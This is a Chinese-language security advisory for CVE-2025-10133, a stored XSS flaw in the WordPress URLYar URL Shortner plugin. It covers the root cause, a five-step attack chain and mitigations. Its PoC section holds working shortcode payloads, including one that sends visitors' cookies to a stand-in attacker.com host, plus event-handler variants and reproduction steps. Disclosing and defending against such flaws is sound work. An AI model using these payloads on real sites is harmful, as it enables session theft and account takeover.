CVE-2025-10133：WordPress URLYar短链接插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-10133

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress URLYar URL Shortner 插件

漏洞概述

CVE-2025-10133是WordPress平台上一款名为URLYar URL Shortner的URL缩短插件中存在的存储型跨站脚本（Stored XSS）漏洞。该漏洞由Wordfence安全团队的安全研究员发现并报告，CVSS评分为6.4分，属于中危级别漏洞。

URLYar URL Shortner是一款广泛使用的WordPress插件，主要功能是为网站管理员提供URL缩短服务。该插件通过短代码（shortcode）机制允许用户在文章或页面中嵌入短链接。漏洞存在于该插件的'urlyar_shortlink'短代码处理逻辑中，由于插件对用户输入的属性参数缺乏充分的输入净化（input sanitization）和输出转义（output escaping）处理，导致恶意攻击者可以在页面中注入任意JavaScript代码或Web脚本。

该漏洞的影响范围涵盖该插件的所有版本，最高至1.1.0版本。由于该漏洞属于存储型XSS，恶意脚本一旦被注入到页面中，将永久存储在数据库中，每当有用户访问包含该恶意代码的页面时，恶意脚本就会自动执行。攻击者可以利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击、传播恶意软件或执行其他恶意操作，对网站用户和网站本身的安全构成严重威胁。

技术细节

该漏洞的根本原因在于URLYar URL Shortner插件的'urlyar_shortlink'短代码在处理用户提供的属性参数时，未能正确实施输入验证和输出编码机制。

在WordPress中，短代码（shortcode）是一种允许开发者创建自定义宏的机制，用户可以在文章、页面或小工具中通过特定的标签语法调用预定义的功能。URLYar插件注册了'urlyar_shortlink'短代码，该短代码接收用户提供的属性参数来生成短链接。

漏洞触发的技术原理如下：

1. **输入验证缺失**：插件在处理短代码属性时，没有使用WordPress提供的安全函数（如wp_kses、esc_attr、esc_url等）对用户输入进行净化处理。这意味着恶意用户可以在属性参数中嵌入HTML标签和JavaScript代码。

2. **输出转义缺失**：即使输入到达数据库前未经过滤，在输出到浏览器时也应该进行适当的转义处理。然而，该插件在渲染短代码输出时也未使用esc_html、esc_attr等转义函数，导致恶意脚本能够直接在浏览器中执行。

3. **权限要求**：利用此漏洞需要攻击者拥有WordPress网站的贡献者（contributor）级别或更高级别的账户访问权限。这意味着攻击者需要先获取有效的账户凭据，但许多WordPress网站允许用户注册并自动获得贡献者级别权限。

4. **影响范围**：由于漏洞影响范围被标记为S:C（Scope Changed），表明该漏洞的影响超出了易受攻击组件本身，恶意脚本的执行可能影响到其他用户和管理员。

成功利用此漏洞后，攻击者可以在网站前端注入恶意JavaScript代码，当其他用户（包括管理员）访问包含恶意代码的页面时，代码将在其浏览器上下文中执行，可能导致账户劫持、数据窃取或进一步的权限提升攻击。

攻击链分析

STEP 1

步骤1：获取账户权限

攻击者通过注册或利用已泄露的凭据获取WordPress网站的贡献者（contributor）级别或更高级别的账户访问权限。许多WordPress网站默认允许用户注册并自动获得贡献者权限。

STEP 2

步骤2：构造恶意短代码

攻击者构造包含恶意JavaScript代码的'urlyar_shortlink'短代码，利用插件对属性参数缺乏输入净化和输出转义的缺陷，将恶意脚本嵌入到短代码参数中。

STEP 3

步骤3：注入恶意内容

攻击者创建新的文章或页面，将构造好的恶意短代码插入到内容中并发布。由于该漏洞属于存储型XSS，恶意代码将被永久存储到WordPress数据库中。

STEP 4

步骤4：等待受害者访问

当其他用户（包括普通用户和管理员）访问包含恶意短代码的页面时，浏览器将解析并执行嵌入的恶意JavaScript代码。

STEP 5

步骤5：执行恶意操作

恶意脚本在受害者浏览器上下文中执行，攻击者可以窃取会话cookie、劫持账户、进行钓鱼攻击、窃取敏感信息或利用管理员权限进一步渗透网站。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Stored XSS PoC for CVE-2025-10133 -->
<!-- Attacker with contributor-level access injects this via the 'urlyar_shortlink' shortcode -->

[urlyar_shortlink url="javascript:alert('XSS')" text=""><script>alert('Stored XSS - CVE-2025-10133');document.location='https://attacker.com/steal?cookie='+document.cookie</script>"]

<!-- Alternative PoC using event handler -->
[urlyar_shortlink url='" onmouseover="alert(document.cookie)" text="Click me"]

<!-- PoC exploiting attribute injection for script execution -->
[urlyar_shortlink url="xss" text="<img src=x onerror=alert('CVE-2025-10133')>"]

<!-- Steps to reproduce:
1. Login as a contributor or higher role user
2. Create a new post or page
3. Insert the malicious shortcode with XSS payload in the content
4. Publish/save the post
5. When any user (including admins) views the page, the JavaScript executes
-->

影响范围

URLYar URL Shortner <= 1.1.0

防御指南

临时缓解措施

在官方发布修复版本之前，建议采取以下临时缓解措施：1）暂时禁用URLYar URL Shortner插件；2）如必须使用该插件，应限制只有受信任的管理员才能创建和发布内容，撤销所有贡献者及以上级别用户的发布权限；3）通过Web应用防火墙（WAF）添加自定义规则，过滤'urlyar_shortlink'短代码中的可疑属性值；4）部署内容安全策略（CSP）头部，限制内联脚本执行；5）定期检查已发布的内容，删除任何可疑的短代码注入；6）监控管理员账户的活动日志，及时发现异常登录或操作行为。